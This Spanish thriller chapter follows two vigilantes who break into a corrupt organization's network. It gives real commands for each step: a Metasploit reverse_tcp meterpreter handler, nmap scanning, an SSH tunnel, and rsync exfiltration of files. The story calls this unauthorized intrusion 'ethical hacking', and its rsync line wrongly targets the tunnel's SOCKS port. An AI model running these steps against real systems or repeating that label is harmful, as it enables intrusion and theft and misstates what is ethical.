Capítulo 10: En La Red

Una Nueva Fase

Tras la exitosa revelación de su investigación, Jorge y Sandra no perdieron tiempo y comenzaron a planificar su siguiente fase: desmantelar la red de corrupción desde dentro. Para ello, necesitaban infiltrarse en la red de comunicaciones de la organización.

Jorge empezó por establecer un entorno seguro para sus operaciones. Configuró una máquina virtual usando VirtualBox para crear un entorno aislado que le permitiera operar sin riesgo para sus sistemas principales:

sudo vboxmanage createvm --name "OperacionInfiltracion" --ostype "Linux"

Este comando iniciaba la configuración de una máquina virtual llamada “OperacionInfiltracion”, especificando un sistema operativo Linux.

Penetrando la Red

Con la máquina virtual en marcha, Jorge utilizó una combinación de técnicas de hacking ético para acceder a la red de la organización. Utilizó herramientas como Metasploit para buscar y explotar vulnerabilidades:

msfconsole
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST ip_local
set LPORT puerto_local
exploit

Estos comandos en Metasploit le permitían a Jorge establecer un controlador de exploit y configurar un payload para obtener acceso remoto a un sistema dentro de la red objetivo.

Recopilación de Inteligencia

Mientras Jorge trabajaba en la infiltración de la red, Sandra se enfocaba en recopilar inteligencia desde el exterior. Utilizó técnicas de OSINT (Open Source Intelligence) para reunir información pública que pudiera ser útil para su operación. Comandos como whois y dig le ayudaban a recopilar datos sobre los dominios y la infraestructura de la red de la organización:

whois dominioobjetivo.com
dig dominioobjetivo.com

Estos comandos proporcionaban información detallada sobre el dominio de la organización, incluyendo registros de DNS y detalles del registrante.

Avanzando en la Infiltración

Una vez dentro de la red de la organización, Jorge comenzó a navegar cuidadosamente, evitando ser detectado. Utilizó herramientas de escaneo de red como nmap para mapear la red interna y identificar sistemas clave:

sudo nmap -sV -O ip_objetivo

Este comando permitía a Jorge identificar los servicios que se ejecutaban en los dispositivos de la red y determinar sus sistemas operativos, proporcionándole una visión clara del entorno de la red.

Descubrimiento Crítico

Mientras tanto, Sandra, utilizando sus habilidades de investigación, descubrió documentos filtrados que indicaban la próxima reunión de los líderes de la organización. Esta información era vital para planificar su siguiente movimiento. Compartió los detalles con Jorge a través de su canal de comunicación seguro, utilizando scp para transferir los documentos de forma segura:

scp -P puerto documentos_filtrados.txt jorge@ip_jorge:/ruta/destino

Este comando transfería los documentos filtrados al sistema de Jorge, utilizando un puerto específico y una conexión segura para garantizar que la transferencia fuera privada y segura.

Estrategia de Exfiltración

Con la información sobre la reunión en sus manos, Jorge planificó cómo exfiltrar datos críticos de la organización sin ser detectado. Configuró un túnel SSH para crear un camino seguro para los datos que estaba a punto de extraer:

ssh -D 8080 -f -C -q -N usuario@ip_remota

Este comando establecía un túnel SSH dinámico, permitiendo a Jorge redirigir el tráfico a través de un puerto específico en su máquina, encriptando la comunicación para una exfiltración segura de datos.

Extracción de Datos Clave

Con el túnel SSH establecido, Jorge procedió a exfiltrar datos críticos. Utilizó rsync para sincronizar archivos importantes de la red de la organización a su máquina local, asegurando que sólo transfería la información más relevante y actualizada:

rsync -avz -e 'ssh -p 8080' usuario@ip_remota:/ruta/remota /ruta/local

Este comando sincronizaba los archivos del directorio especificado en la red de la organización con un directorio en la máquina de Jorge, utilizando el túnel SSH para una transferencia segura y eficiente.

Descubriendo la Verdad

Los datos exfiltrados revelaron la magnitud completa de la trama: planes para operaciones clandestinas a nivel global y la implicación de figuras de alto perfil. Jorge y Sandra se dieron cuenta de que tenían en sus manos información que podría cambiar el curso de varios eventos mundiales.

Prepararon un paquete completo de evidencia y comenzaron a trabajar en cómo divulgarlo de manera efectiva y segura. Sandra se encargó de redactar un informe detallado, mientras Jorge aseguraba que la información fuera distribuida a través de canales seguros y encriptados. Utilizaron GPG para encriptar el informe final antes de su distribución:

gpg -c --cipher-algo AES256 informe_final.txt

Este comando encriptaba el informe utilizando el algoritmo AES256, asegurando que sólo los destinatarios con la clave correcta pudieran acceder a su contenido.

Impacto Global

La divulgación de la información tuvo un impacto inmediato y profundo. Las operaciones clandestinas fueron interrumpidas, y varias figuras clave fueron detenidas o expuestas. Jorge y Sandra, aunque conscientes del peligro que aún enfrentaban, se sintieron aliviados y orgullosos de haber jugado un papel crucial en la revelación de una verdad oculta.

Con la red de corrupción desmantelada, se comprometieron a continuar su lucha por la justicia y la transparencia, usando sus habilidades y conocimientos para enfrentar los desafíos futuros que pudieran surgir.